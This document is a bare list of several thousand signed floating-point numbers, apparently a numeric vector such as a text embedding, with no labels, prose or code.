-0.0036281796637922525, -0.009592553600668907, 0.02011958323419094, -0.004332577344030142, 0.0014318035682663321, 0.006428072694689035, -0.0075253755785524845, -0.00218044756911695, 0.01010934729129076, 0.026745878159999847, -0.015829483047127724, 0.0061555164866149426, 0.00912531465291977, -0.02360263653099537, -0.012169445864856243, 0.021521300077438354, 0.011879191733896732, 0.036359671503305435, 0.007815630175173283, -0.014838370494544506, -0.017316151410341263, 0.033754460513591766, 0.007631566375494003, -0.06858498603105545, -0.01737278699874878, -0.027170641347765923, 0.0071784863248467445, 0.007999693974852562, 0.0059183575212955475, 0.01849132776260376, 0.011716365814208984, 0.020785044878721237, -0.018717868253588676, -0.0002984399034176022, 0.00479981629177928, -0.01530560851097107, -0.00936601310968399, 0.040522344410419464, -0.007497058250010014, 0.0013450812548398972, 0.018024088814854622, -0.022682318463921547, 0.007652804255485535, 0.005769690498709679, -0.019043518230319023, 0.028161754831671715, 0.008743028156459332, 0.035198651254177094, -0.02848740480840206, -0.022342506796121597, -0.012650842778384686, -0.02184695191681385, -0.011801318265497684, -0.014569354243576527, -0.010760650038719177, 0.010066871531307697, 0.004371514078229666, 0.013500368222594261, -0.027241434901952744, 0.022413302212953568, -0.005015737377107143, -0.04737517610192299, -0.002201685681939125, 0.012700398452579975, -0.020954949781298637, -0.004821054637432098, -0.01486668735742569, 0.015673736110329628, 0.0143074169754982, -0.002881305757910013, -0.004605133552104235, 0.0032830601558089256, 0.022257555276155472, -0.013585320673882961, 0.007596169598400593, 0.023928288370370865, -0.020346123725175858, 0.033782776445150375, 0.0044670854695141315, -0.011284523643553257, -0.015447196550667286, 0.006442231126129627, 0.04055066034197807, -0.023546000942587852, -0.005659960210323334, -0.009981919080018997, -0.0035697747953236103, 0.0069307079538702965, 0.020983267575502396, -0.00953591801226139, -0.0048953876830637455, -0.0007725367904640734, 0.00496264174580574, -0.0010353586403653026, 0.0017078992677852511, -0.036727797240018845, 0.00936601310968399, -0.008566044270992279, -0.02072840929031372, 0.005196261219680309, -0.021790316328406334, -0.00026193688972853124, -0.011461508460342884, 0.036189764738082886, 0.0036193304695189, 0.02333362028002739, -0.009741219691932201, -0.007780233398079872, -0.013153478503227234, 0.015730371698737144, -0.0069023906253278255, 0.033074840903282166, 0.012898621149361134, 0.007935979403555393, 0.015135703608393669, 0.008020931854844093, 0.00036569396615959704, -0.015532149001955986, -0.006870533339679241, -0.007589090149849653, -0.027269752696156502, 0.036359671503305435, 0.004959102254360914, -0.0008380210492759943, -0.004045862704515457, -0.0028069722466170788, 0.011397793889045715, 0.009358934126794338, 0.01839221641421318, 0.009861569851636887, -0.017840025946497917, 0.01317471731454134, 0.009082837961614132, -0.029959915205836296, -0.024395527318120003, 0.004686546511948109, -0.023291144520044327, 0.00963502936065197, -0.003971529193222523, -0.024777812883257866, 0.017047135159373283, -0.0030901471618562937, -0.05051841959357262, -0.0012265017721801996, 0.008105884306132793, -0.0026901625096797943, 0.02002047188580036, 0.00466530816629529, -0.009302298538386822, -0.007900582626461983, 0.0257406085729599, -0.0026441465597599745, -0.019751455634832382, 0.048281338065862656, -0.006385596469044685, 0.004654689226299524, 0.022583207115530968, 0.006594437640160322, 0.03417922183871269, 0.0289546437561512, -0.015829483047127724, 0.011029666289687157, -0.01876034401357174, -0.0013141089584678411, 0.014810052700340748, 0.021223966032266617, 0.020544346421957016, -0.01849132776260376, -0.0022406221833080053, -0.015588783659040928, 0.014413607306778431, 0.014187067747116089, -0.0038264021277427673, 0.013181796297430992, -0.004923705477267504, -0.016041863709688187, 0.023531842976808548, 0.009273981675505638, -0.04358063265681267, -0.06252504140138626, 0.0014114504447206855, 0.0008428880828432739, 0.00976953748613596, -0.0038157831877470016, 0.0009141243062913418, -0.026703402400016785, 0.020813362672924995, 0.019666504114866257, 0.03732246533036232, -0.004307799506932497, 0.008325344882905483, -0.005369706079363823, -0.000710149819497019, 0.011900429613888264, -0.0027521071024239063, -0.0088916951790452, -0.017726754769682884, 0.052245788276195526, -0.0033750920556485653, -0.005985611584037542, 0.027326388284564018, -0.006304183509200811, 0.015829483047127724, 0.007900582626461983, 0.0022990270517766476, -0.01893024891614914, -0.011263285763561726, -0.01951075717806816, -0.006052865646779537, 0.01459767110645771, 0.009224426001310349, 0.01451271865516901, 0.01090223714709282, -0.0005097149987705052, 0.006197992712259293, -0.017089610919356346, -0.010810205712914467, 0.012572970241308212, 0.015149862505495548, 0.002060098107904196, 0.01452687755227089, 0.03992767632007599, -0.023970764130353928, -0.000908814778085798, -0.007245740387588739, -0.01412335317581892, -0.016990499570965767, 0.014364051632583141, 0.011157095432281494, 0.019836409017443657, -0.011291603557765484, 0.012509255670011044, 0.021478824317455292, -0.015617101453244686, -0.023928288370370865, 0.027114005759358406, 0.011135856620967388, 0.002546805189922452, -0.0000572986900806427, -0.002592821139842272, -0.03208372741937637, 0.0022600905504077673, -0.0038441007491201162, -0.002699011703953147, -0.01408795639872551, -0.013620717450976372, 0.01512154471129179, 0.012148207984864712, -0.011949985288083553, 0.03681274875998497, 0.003982148598879576, 0.011596016585826874, 0.010088109411299229, 0.021294759586453438, -0.027779467403888702, 0.0008796123438514769, 0.03335801512002945, 0.022838063538074493, -0.011079221963882446, 0.011680969037115574, 0.007638645824044943, -0.00980493426322937, 0.0037308307364583015, -0.020742569118738174, 0.05063169077038765, -0.005348467733711004, 0.01601354591548443, 0.003587473416700959, 0.02255488932132721, -0.01578700728714466, -0.016027705743908882, -0.015178180299699306, -0.0035414574667811394, -0.0044352286495268345, 0.007928900420665741, 0.007943058386445045, -0.008898774161934853, 0.017698436975479126, -0.023220350965857506, -0.006753723602741957, 0.024749495089054108, -0.02058682218194008, 0.0031715601217001677, -0.0065130251459777355, 0.009266901761293411, 0.019227582961320877, 0.000648205284960568, 0.04077719897031784, 0.015602942556142807, 0.017061293125152588, 0.013726907782256603, -0.00942972768098116, 0.0018547963118180633, 0.002907853340730071, -0.005305991508066654, 0.001252164482139051, 0.00971998181194067, -0.006491786800324917, -0.0019521376816555858, 0.007040438707917929, -0.003343234769999981, -0.005921897012740374, -0.005387404467910528, -0.003723751287907362, 0.0008406757842749357, -0.007716518826782703, 0.028119277209043503, 0.0062652467750012875, 0.006442231126129627, 0.010555348359048367, 0.002674233866855502, -0.01014474406838417, 0.01036420464515686, -0.012891542166471481, -0.0013141089584678411, -0.010321728885173798, 0.02055850438773632, -0.022271713241934776, 0.012983573600649834, -0.011468587443232536, 0.00814836099743843, 0.012502176687121391, 0.004187450278550386, -0.0021946062333881855, -0.013068526051938534, -0.022498253732919693, 0.0264202281832695, -0.0186329148709774, 0.0177833903580904, -0.01049871277064085, 0.01615513302385807, 0.007546613924205303, -0.023107079789042473, -0.011553539894521236, -0.0002986611216329038, -0.0011052674381062388, 0.001466315588913858, -0.0031927982345223427, -0.00414851401001215, -0.02472117729485035, -0.0023415032774209976, 0.009826172143220901, 0.01771259680390358, 0.02245577797293663, 0.013896813616156578, 0.009082837961614132, -0.010180141776800156, -0.005759071558713913, -0.004686546511948109, 0.008898774161934853, 0.015234814956784248, 0.020785044878721237, 0.006725406274199486, 0.018972724676132202, 0.01977977342903614, -0.012424303218722343, 0.004173291381448507, -0.010888079181313515, 0.010130586102604866, -0.009266901761293411, 0.033980999141931534, -0.003298988798633218, -0.011893349699676037, 0.01703297719359398, 0.013677353039383888, -0.012827827595174313, 0.00845277402549982, 0.0005309531115926802, -0.009436806663870811, 0.034632302820682526, 0.0026264481712132692, 0.006024548318237066, -0.008141281083226204, 0.0017663040198385715, -0.02367343008518219, -0.005029895808547735, 0.004569736775010824, 0.00518918177112937, 0.00701920036226511, -0.015857800841331482, -0.002410527318716049, 0.011942905373871326, 0.000985802966170013, 0.01368443202227354, -0.00436797458678484, -0.01679227687418461, 0.0034175682812929153, -0.01917094737291336, -0.005405102856457233, -0.011397793889045715, 0.0014601211296394467, -0.01046331599354744, 0.01642414927482605, -0.014434846118092537, -0.00500511797145009, -0.022441618144512177, 0.013450812548398972, -0.013415415771305561, 0.007075835485011339, 0.016778118908405304, -0.004081259947270155, -0.014640147797763348, -0.010569507256150246, -0.03279166668653488, -0.028374135494232178, 0.018689550459384918, 0.00479981629177928, -0.0007159017841331661, -0.008898774161934853, -0.029478518292307854, -0.016551578417420387, 0.010965951718389988, -0.006180294323712587, -0.013167637400329113, -0.012587129138410091, 0.005390943959355354, 0.021889427676796913, -0.0009504060726612806, 0.018689550459384918, 0.032395221292972565, 0.0016256015514954925, 0.007851026952266693, 0.00484229251742363, 0.02228587307035923, 0.010739412158727646, -0.028090959414839745, -0.005426341202110052, 0.008693472482264042, -0.006951946299523115, 0.01987888477742672, 0.004849371965974569, -0.0006619215710088611, -0.0057236747816205025, 0.011256206780672073, 0.019383328035473824, -0.016112657263875008, -0.0029998852405697107, 0.012608367018401623, -0.00711123226210475, -0.007383788004517555, -0.00945096556097269, -0.022569047287106514, 0.015843641012907028, -0.020600982010364532, -0.029988233000040054, 0.0010964182438328862, 0.015418878756463528, 0.0169338658452034, -0.003212266368791461, -0.0048953876830637455, -0.012169445864856243, -0.005309531465172768, -0.022951334714889526, -0.0020247013308107853, 0.005118388216942549, 0.01666484959423542, 0.004176831338554621, 0.0051431660540401936, -0.027114005759358406, -0.008381980471313, -0.004329037852585316, 0.00884213950484991, 0.0174435805529356, -0.006406834349036217, -0.02644854597747326, -0.01317471731454134, 0.02170536480844021, -0.029251977801322937, 0.004130815155804157, 0.009019123390316963, -0.006162595935165882, 0.019298376515507698, 0.0024441543500870466, -0.0026866227854043245, -0.0025981306098401546, -0.025018511340022087, 0.01378354337066412, 0.018533803522586823, 0.0018264787504449487, -0.015263132750988007, 0.0026122895069420338, 0.003829941852018237, 0.015871958807110786, -0.007298835553228855, 0.001730907242745161, 0.006750184111297131, 0.02831749990582466, 0.022342506796121597, 0.011610175482928753, 0.008353662677109241, 0.007560772355645895, 0.009443886578083038, 0.0005433420301415026, -0.012622525915503502, -0.00009114695421885699, -0.011744683608412743, -0.0029060833621770144, -0.000555730948690325, 0.007666963152587414, 0.017868341878056526, -0.004739641677588224, -0.005203340668231249, 0.0019308995688334107, -0.016268404200673103, 0.009358934126794338, 0.001551268040202558, 0.01522065605968237, 0.01629672199487686, 0.0005756416940130293, 0.012233160436153412, 0.0004278597189113498, -0.030979344621300697, -0.012197763659060001, -0.023531842976808548, -0.008700552396476269, 0.00828286912292242, 0.02593882940709591, 0.003791005350649357, -0.008042169734835625, 0.013111002743244171, 0.011114618740975857, -0.002736178459599614, 0.010661538690328598, 0.004711323883384466, -0.0016583435935899615, 0.02939356490969658, -0.00025441503385081887, 0.016282562166452408, -0.009946522302925587, -0.0002661402686499059, 0.001093763392418623, 0.0054192617535591125, 0.009896966628730297, -0.018278947100043297, -0.0003791890339925885, 0.009443886578083038, -0.0034954415168613195, -0.0009459814755246043, 0.001007041078992188, -0.016919706016778946, 0.002035320270806551, -0.005727214273065329, 0.0016548038693144917, 0.010527030564844608, 0.003957370761781931, 0.003169790143147111, 0.010215538553893566, 0.002656535478308797, 0.005178562831133604, -0.00824747234582901, -0.025726448744535446, -0.020516028627753258, -0.017556849867105484, 0.012997732497751713, -0.0036494177766144276, -0.008969568647444248, -0.01629672199487686, -0.0018211692804470658, 0.0004765304329339415, 0.00968458503484726, -0.01442776620388031, 0.008020931854844093, -0.0028211309108883142, 0.010286332108080387, -0.0033857112284749746, -0.008325344882905483, 0.02797769010066986, -0.013910971581935883, 0.013896813616156578, -0.024735337123274803, -0.006021008361130953, 0.03160233050584793, 0.012863224372267723, -0.026986578479409218, 0.005893579684197903, -0.02106822095811367, -0.005635182373225689, 0.019015202298760414, -0.007858105935156345, -0.022923016920685768, 0.003483052598312497, 0.011482746340334415, -0.009309378452599049, -0.008643916808068752, -0.021931903436779976, 0.00912531465291977, 0.029251977801322937, 0.008594361133873463, 0.02130891941487789, -0.015461355447769165, -0.00002338129525014665, 0.00985448993742466, -0.0004867070238105953, -0.02520257607102394, -0.011857952922582626, 0.015376402996480465, 0.027524610981345177, 0.00946512445807457, 0.009132393635809422, 0.0035060604568570852, -0.006413913797587156, 0.003932592924684286, -0.00518918177112937, 0.02028948813676834, -0.028388293460011482, 0.019425805658102036, -0.00873594917356968, 0.000545996823348105, -0.006428072694689035, 0.016041863709688187, -0.0075678518041968346, 0.0015733911423012614, -0.010505792684853077, -0.019425805658102036, 0.0015778157394379377, -0.018066564574837685, -0.009373093023896217, 0.010519951581954956, 0.016721483319997787, 0.014130432158708572, 0.025145940482616425, 0.029082072898745537, 0.005206880159676075, -0.00649532675743103, -0.0087217902764678, -0.03228195011615753, -0.008792583830654621, 0.017670121043920517, 0.034462396055459976, -0.0035644653253257275, 0.015348085202276707, -0.009762458503246307, 0.005175023339688778, -0.012997732497751713, -0.006176754832267761, 0.007794391829520464, 0.01015890296548605, -0.006261707283556461, 0.0035272985696792603, 0.01564541831612587, 0.013054367154836655, 0.009288139641284943, 0.007659883704036474, 0.0002287523093400523, 0.022172601893544197, -0.01313932053744793, 0.009373093023896217, -0.009068679064512253, -0.0063077230006456375, 0.0016149823786690831, -0.00035485366242937744, -0.006551961414515972, 0.010647379793226719, -0.006162595935165882, 0.009019123390316963, -0.012211921624839306, 0.011114618740975857, -0.010781887918710709, -0.002783964155241847, 0.024140669032931328, 0.007284677121788263, 0.018109042197465897, 0.0020671775564551353, 0.020572664216160774, 0.021323077380657196, 0.009351854212582111, -0.028020165860652924, 0.008700552396476269, -0.028062643483281136, -0.000044633248762693256, 0.015560466796159744, 0.0012318112421780825, -0.04026748612523079, 0.006824517622590065, 0.029251977801322937, 0.0029450200963765383, -0.013351701200008392, 0.007964297197759151, 0.016240086406469345, -0.0037414496764540672, 0.006990883033722639, 0.00431841891258955, 0.02391412854194641, -0.011426111683249474, 0.02079920470714569, -0.007596169598400593, -0.01893024891614914, 0.009167790412902832, 0.021039903163909912, -0.0037060528993606567, 0.009946522302925587, 0.006102421320974827, -0.012282716110348701, -0.04527968168258667, -0.008728869259357452, 0.012148207984864712, -0.007914741523563862, 0.015376402996480465, 0.02493355982005596, 0.0022370824590325356, 0.0041060373187065125, -0.02024701237678528, 0.005433420184999704, -0.01564541831612587, -0.006396215409040451, -0.017386944964528084, 0.0007225387380458415, 0.007224502041935921, -0.005964373704046011, 0.017585167661309242, 0.02140803076326847, 0.0035025207325816154, -0.0088067427277565, -0.0038193229120224714, 0.02309292182326317, 0.002097264863550663, 0.021124854683876038, 0.015617101453244686, 0.011150015518069267, -0.021988539025187492, -0.0028972341679036617, 0.00907575897872448, -0.018179835751652718, -0.0005207765498198569, -0.01683475449681282, -0.022370824590325356, 0.012636684812605381, -0.028501564636826515, 0.01608433946967125, 0.007744836155325174, -0.01902936026453972, -0.004771498963236809, -0.0036706558894366026, -0.0177833903580904, -0.00975537858903408, 0.008318265900015831, -0.003851179964840412, 0.00021536786516662687, -0.009875727817416191, -0.011539380997419357, -0.0028370595537126064, -0.02549990825355053, -0.005436960142105818, 0.005206880159676075, -0.0020247013308107853, -0.017160404473543167, -0.022597365081310272, 0.01622592844069004, -0.0033910206984728575, 0.024438003078103065, 0.02089831605553627, 0.022172601893544197, -0.023517683148384094, 0.003143242560327053, -0.016041863709688187, 0.01679227687418461, -0.00894125085324049, -0.017571009695529938, -0.011588936671614647, 0.018278947100043297, 0.007426264230161905, 0.005277674179524183, 0.007985535077750683, -0.027991848066449165, -0.0035007509868592024, 0.012318112887442112, 0.007773153949528933, 0.003295449074357748, 0.013217193074524403, -0.002019391627982259, 0.014838370494544506, -0.003875957801938057, -0.027921054512262344, -0.022710634395480156, -0.005691817495971918, 0.010017315857112408, 0.0069413273595273495, 0.0071784863248467445, 0.0009035052498802543, 0.015064910054206848, 0.0035803939681500196, -0.0009389021433889866, 0.01520649716258049, -0.013925130479037762, -0.007851026952266693, -0.011029666289687157, -0.00850232969969511, 0.0002154784742742777, -0.004438768140971661, 0.014810052700340748, -0.030894393101334572, -0.00877134595066309, 0.00933061633259058, -0.003295449074357748, -0.030129820108413696, 0.01907183602452278, 0.01432865485548973, -0.012211921624839306, -0.013712749816477299, -0.011688048020005226, -0.011900429613888264, -0.026292799040675163, -0.004523720592260361, 0.007957217283546925, 0.017018817365169525, -0.011065063066780567, 0.006951946299523115, -0.023206191137433052, -0.017217040061950684, -0.0026848530396819115, 0.0003787465684581548, -0.008240392431616783, -0.018746186047792435, -0.011001348495483398, 0.0203178059309721, -0.02990327961742878, -0.021861109882593155, -0.020445235073566437, 0.007072295527905226, 0.01900104247033596, -0.00680681923404336, -0.008566044270992279, -0.012332271784543991, -0.020091267302632332, -0.0019946140237152576, 0.02817591279745102, -0.0036954337265342474, -0.011581857688724995, 0.0184630099684, -0.02160625346004963, -0.011008428409695625, 0.02024701237678528, -0.00706167658790946, -0.01934085227549076, 0.03684106841683388, 0.014151670970022678, -0.010923475958406925, 0.011900429613888264, -0.029676740989089012, -0.01390389259904623, 0.007766074500977993, -0.006863453891128302, -0.008778424933552742, 0.008176677860319614, 0.002930861199274659, -0.023616794496774673, -0.011879191733896732, -0.01666484959423542, 0.018307263031601906, -0.0021928364876657724, 0.02905375510454178, -0.00041746190981939435, 0.02191774547100067, -0.002868916839361191, 0.018986884504556656, -0.018193993717432022, -0.011206651106476784, -0.021634569391608238, -0.006743104662746191, 0.011029666289687157, -0.0010813745902851224, 0.007298835553228855, -0.006031627766788006, 0.02184695191681385, -0.008920012973248959, -0.0006800624541938305, 0.0016256015514954925, 0.012488017790019512, -0.01856212131679058, 0.011242047883570194, 0.01808072440326214, -0.0030706790275871754, -0.003999846987426281, 0.001400831388309598, 0.006654612720012665, 0.010640300810337067, -0.014031321741640568, 0.0008716480806469917, 0.00867223460227251, -0.01686307229101658, -0.02408403344452381, -0.017287833616137505, 0.009394330903887749, -0.012353509664535522, -0.007546613924205303, 0.003914894536137581, 0.002778654685243964, 0.007681122049689293, -0.008679313585162163, 0.01839221641421318, 0.0027857341337949038, 0.004470625426620245, -0.0005676773726008832, 0.03191382437944412, 0.014541036449372768, -0.003401639638468623, -0.016027705743908882, 0.0033680126070976257, 0.001404370996169746, 0.006300644017755985, 0.003037051996216178, -0.001660998328588903, 0.008764266036450863, -0.02140803076326847, -0.006293564569205046, 0.001840637531131506, 0.012523414567112923, 0.012013699859380722, -0.013323383405804634, -0.015135703608393669, 0.004626371432095766, -0.011886270716786385, 0.018236469477415085, 0.004686546511948109, -0.004647609777748585, 0.010491633787751198, -0.02269647642970085, -0.012615446001291275, -0.0035821637138724327, 0.004729022737592459, 0.016480784863233566, 0.010611983016133308, -0.021733680739998817, 0.024565432220697403, -0.017146246507763863, 0.013656114228069782, -0.004357355181127787, -0.0011610174551606178, -0.006382056511938572, 0.009302298538386822, 0.002182217314839363, 0.00036591518437489867, 0.004198069218546152, -0.013486209325492382, -0.00010054925223812461, 0.027963532134890556, -0.01683475449681282, 0.0041591329500079155, 0.027170641347765923, -0.0021273521706461906, 0.02939356490969658, -0.0047007049433887005, 0.009266901761293411, 0.002502558985725045, 0.00997483916580677, 0.007666963152587414, -0.01469678245484829, -0.013011891394853592, -0.019822251051664352, -0.015588783659040928, 0.0035449969582259655, -0.009181949310004711, 0.001520295743830502, 0.003122004447504878, -0.006597977597266436, -0.020445235073566437, 0.0036317193880677223, 0.007964297197759151, 0.02583971805870533, 0.0068315970711410046, -0.004063561093062162, 0.04108869284391403, -0.004120196215808392, 0.013861415907740593, 0.004831673577427864, 0.0005004233098588884, 0.0017078992677852511, -0.0007610328029841185, 0.01051287166774273, -0.003228195011615753, -0.0006119234603829682, -0.007744836155325174, -0.006081182975322008, -0.011914588510990143, -0.0021963762119412422, -0.020855838432908058, 0.0022105348762124777, -0.027921054512262344, 0.022611523047089577, -0.02831749990582466, 0.0007800586172379553, -0.0007464315858669579, -0.007553693372756243, 0.0068599143996834755, 0.02053018845617771, -0.048111431300640106, 0.009323537349700928, -0.016707325354218483, 0.0006150206900201738, 0.021931903436779976, 0.00684221601113677, -0.010873920284211636, -0.006353739183396101, 0.005628103390336037, -0.011242047883570194, 0.009217346087098122, -0.02404155768454075, 0.0009583703940734267, 0.002829980105161667, -0.008438615128397942, -0.009408489800989628, -0.015829483047127724, -0.005582087207585573, -0.017726754769682884, 0.010173061862587929, 0.013790622353553772, -0.03092271089553833, 0.012318112887442112, 0.008573123253881931, -0.011751762591302395, 0.020714251324534416, -0.0009353624191135168, -0.0025114084128290415, 0.004081259947270155, 0.00988988671451807, -0.008608520030975342, 0.004169751890003681, -0.00877134595066309, -0.0025149479042738676, -0.005249356385320425, -0.009033282287418842, -0.02600962482392788, -0.0024246859829872847, 0.03321642801165581, -0.007298835553228855, -0.000011904964594577905, 0.008629757910966873, 0.013620717450976372, -0.023730065673589706, 0.020516028627753258, -0.012346429750323296, 0.022300031036138535, 0.0010698705445975065, 0.001165442168712616, -0.02525920979678631, -0.0067466446198523045, 0.004636990837752819, -0.0059608337469398975, 0.008275789208710194, -0.02211596816778183, 0.0031361631117761135, -0.005355547182261944, -0.00479273684322834, -0.013118081726133823, 0.010314649902284145, 0.002175138099119067, -0.0027521071024239063, -0.0008504099096171558, 0.01927005872130394, 0.014130432158708572, 0.0015503831673413515, -0.011220809072256088, -0.00933061633259058, 0.009932363405823708, 0.022031014785170555, 0.00465822871774435, 0.004067101050168276, 0.0037095926236361265, -0.009812014177441597, 0.005433420184999704, -0.01673564314842224, 0.029846645891666412, 0.00784394796937704, 0.004332577344030142, 0.015263132750988007, -0.003237044205889106, 0.005118388216942549, 0.0019114313181489706, -0.03072448819875717, -0.003337925300002098, -0.008381980471313, 0.005415721796452999, 0.011171253398060799, 0.006987343076616526, -0.007950138300657272, 0.003426417475566268, -0.00784394796937704, -0.025117622688412666, -0.007723598275333643, -0.0010194299975410104, 0.0045060222037136555, 0.005659960210323334, -0.016480784863233566, 0.012594208121299744, 0.0036954337265342474, -0.0011955294758081436, -0.004265323281288147, -0.007089993916451931, 0.015730371698737144, 0.02919534221291542, 0.010873920284211636, -0.019581550732254982, -0.00440337136387825, 0.006151976995170116, 0.008091725409030914, -0.0006384711596183479, -0.00226540002040565, -0.007723598275333643, -0.007645725272595882, 0.0064599295146763325, 0.0024884003214538097, 0.015008275397121906, -0.008155439980328083, -0.005755532067269087, 0.002778654685243964, 0.018208153545856476, -0.0037131321150809526, 0.029846645891666412, 0.0074828993529081345, -0.013691511005163193, 0.0008627988281659782, 0.0069413273595273495, -0.006920089013874531, 0.010859761387109756, -0.014024241827428341, -0.0056139444932341576, -0.0004946713452227414, 0.01316055841743946, 0.022908857092261314, -0.009217346087098122, -0.002525567077100277, -0.001906121731735766, -0.005132547114044428, -0.010314649902284145, 0.001474279910326004, -0.022809745743870735, 0.00963502936065197, 0.010817284695804119, -0.008070487529039383, -0.014095035381615162, 0.006898851133882999, 0.007631566375494003, 0.013153478503227234, 0.0013672043569386005, -0.0092315049842, 0.002461852738633752, -0.012941097840666771, 0.028133437037467957, 0.005175023339688778, -0.003617560723796487, -0.0012725177221000195, 0.01478173490613699, 0.00505467364564538, -0.031149249523878098, -0.01598522812128067, 0.02282390557229519, -0.0024282257072627544, 0.037917133420705795, 0.004661768674850464, 0.0050192768685519695, -0.0038653388619422913, 0.0259105134755373, -0.013472050428390503, -0.026632608845829964, 0.00039777238271199167, -0.005751992110162973, 0.011227888986468315, 0.003929052967578173, -0.0033467744942754507, -0.00916071143001318, 0.014470242895185947, 0.01299065351486206, -0.020105425268411636, 0.018236469477415085, 0.014314495958387852, 0.010222617536783218, 0.006527183577418327, 0.017457738518714905, 0.00950052123516798, 0.011964144185185432, 0.016041863709688187, 0.0012840216513723135, -0.022923016920685768, 0.006951946299523115, 0.006948406808078289, -0.01612681709229946, 0.0047007049433887005, -0.0005079451366327703, 0.012424303218722343, -0.02367343008518219, 0.003352084197103977, 0.008948329836130142, -0.020034631714224815, -0.011043825186789036, -0.01090223714709282, -0.007419185247272253, 0.0030901471618562937, -0.007022739853709936, 0.025188416242599487, 0.001113231759518385, 0.007822709158062935, 0.02153545804321766, -0.009790775366127491, 0.0025397257413715124, -0.005727214273065329, -0.002051248913630843, 0.004173291381448507, 0.005426341202110052, -0.0036848147865384817, -0.005465277470648289, -0.01512154471129179, -0.006297104060649872, -0.020501870661973953, 0.025287527590990067, 0.02421146258711815, 0.030158137902617455, 0.004491863306611776, -0.019015202298760414, 0.0013353470712900162, -0.0009052751120179892, 0.02600962482392788, -0.009273981675505638, 0.00623338995501399, -0.00008323796646436676, 0.010958872735500336, 0.003511369926854968, -0.00017897544603329152, 0.027213117107748985, 0.009472203440964222, -0.008778424933552742, 0.0022211538162082434, 0.004775038454681635, 0.005341388285160065, 0.034462396055459976, -0.005383864510804415, 0.012523414567112923, 0.013776463456451893, 0.003364472882822156, 0.017500214278697968, -0.019907202571630478, -0.008665154688060284, 0.009642109274864197, -0.01951075717806816, -0.0038653388619422913, 0.009592553600668907, -0.030667852610349655, 0.021691204980015755, -0.0028990041464567184, -0.006102421320974827, 0.01290570106357336, 0.015333926305174828, -0.0007499713101424277, 0.00028472361736930907, 0.008084646426141262, -0.012948176823556423, 0.011213730089366436, -0.016608214005827904, -0.0169338658452034, 0.005621023941785097, 0.0088916951790452, 0.006321881897747517, 0.013181796297430992, -0.015602942556142807, 0.020006313920021057, 0.00649532675743103, 0.007794391829520464, -0.004718403331935406, -0.00392197398468852, -0.016367515549063683, 0.012346429750323296, -0.0010663308203220367, 0.007532455027103424, 0.006597977597266436, -0.0018247088883072138, 0.01815151795744896, 0.008481090888381004, -0.011645572260022163, -0.0027326387353241444, 0.00475734006613493, -0.028742263093590736, 0.0046299113892018795, 0.011100459843873978, -0.012374747544527054, 0.003985688090324402, -0.012034937739372253, -0.00836782157421112, -0.0017707287333905697, -0.011815477162599564, -0.00047874273150227964, -0.00936601310968399, -0.0006871418445371091, 0.005313070956617594, -0.01734446920454502, 0.007164327427744865, -0.01335878111422062, -0.017868341878056526, 0.01469678245484829, -0.0078014712780714035, 0.02316371537744999, 0.0005676773726008832, 0.00318394904024899, -0.012884462252259254, -0.017755072563886642, 0.0024724716786295176, 0.011907508596777916, -0.0045484984293580055, 0.0023662811145186424, -0.0179532952606678, 0.012084493413567543, 0.03131915628910065, -0.0201479010283947, -0.0007822709158062935, 0.0036087115295231342, 0.0028618373908102512, -0.007341311778873205, -0.006187373772263527, 0.01581532321870327, 0.007504137698560953, -0.00858728215098381, -0.0005026356084272265, -0.03112093359231949, -0.005776769947260618, 0.008424456231296062, 0.024126511067152023, 0.018236469477415085, 0.018944406881928444, 0.00458035571500659, -0.017047135159373283, -0.018208153545856476, 0.021861109882593155, 0.004771498963236809, 0.013762305490672588, -0.0085518853738904, -0.011220809072256088, 0.015064910054206848, 0.012459699995815754, 0.004739641677588224, 0.01469678245484829, -0.013925130479037762, -0.024749495089054108, -0.00025131780421361327, 0.0012450850335881114, 0.0004570621531456709, -0.007553693372756243, 0.013755225576460361, -0.0020264710765331984, 0.018477169796824455, 0.013790622353553772, 0.0035166796296834946, -0.005557309370487928, -0.007256359327584505, 0.01720288209617138, 0.0011804858222603798, -0.0034565047826617956, 0.012339350767433643, 0.00209195539355278, 0.005500674247741699, -0.01598522812128067, -0.0072492798790335655, 0.008495249785482883, -0.015263132750988007, -0.04462838172912598, -0.030328042805194855, 0.011036745272576809, -0.008792583830654621, 0.006031627766788006, -0.00654488243162632, 0.027071529999375343, 0.01356408279389143, -0.0014371131546795368, -0.012473858892917633, -0.013932210393249989, -0.0031397028360515833, 0.01622592844069004, 0.01571621187031269, -0.023829177021980286, -0.020841680467128754, -0.025825560092926025, 0.003681275062263012, 0.0043113394640386105, 0.0031414725817739964, 0.01522065605968237, -0.002849448472261429, -0.007447502575814724, -0.013287986628711224, -0.013365860097110271, -0.0070121209137141705, 0.0342075414955616, -0.0008375785546377301, -0.007780233398079872, 0.004357355181127787, 0.003169790143147111, -0.02939356490969658, -0.007511217147111893, 0.009606711566448212, 0.021648729220032692, -0.00344234611839056, -0.019836409017443657, -0.014880846254527569, 0.009266901761293411, -0.014194146730005741, 0.001230926369316876, -0.011369476094841957, -0.0021556697320193052, 0.016112657263875008, 0.012473858892917633, -0.0082970280200243, -0.00111146189738065, 0.0022937175817787647, -0.008049249649047852, 0.005068832542747259, 0.011461508460342884, -0.007118311710655689, 0.011567698791623116, 0.005964373704046011, -0.004845832008868456, 0.004247624892741442, 0.0012822517892345786, 0.016919706016778946, -0.008233313448727131, 0.012353509664535522, -0.00959963258355856, 0.0030087344348430634, -0.007305915001779795, -0.0087217902764678, 0.0024724716786295176, 0.0078014712780714035, 0.00483521306887269, 0.009309378452599049, -0.02651933953166008, 0.0012548192171379924, -0.0002864934504032135, 0.0034334969241172075, -0.02438136748969555, -0.019765615463256836, 0.0034600445069372654, -0.01885945536196232, -0.006297104060649872, 0.0036193304695189, -0.0013539304491132498, -0.020685933530330658, -0.020473552867770195, -0.011511064134538174, -0.008403218351304531, 0.0069838035851716995, -0.002206995151937008, 0.007737757172435522, 0.028218388557434082, 0.027114005759358406, 0.009302298538386822, 0.0046723876148462296, 0.004176831338554621, 0.014909164048731327, -0.00117694609798491, -0.0018300184747204185, -0.01927005872130394, -0.0039963070303201675, 0.01520649716258049, 0.020983267575502396, 0.003571544773876667, 0.005936055909842253, 0.004113116767257452, 0.004300720524042845, -0.013450812548398972, 0.019496599212288857, 0.01493748091161251, 0.007659883704036474, 0.00025972456205636263, -0.000700415694154799, 0.0008964258595369756, -0.009033282287418842, -0.008658075705170631, -0.013677353039383888, 0.006608596537262201, 0.02482028864324093, -0.01354992389678955, 0.03675611689686775, 0.022130126133561134, -0.006003309972584248, 0.01885945536196232, 0.02231419086456299, -0.008849218487739563, 0.005514833144843578, -0.007075835485011339, 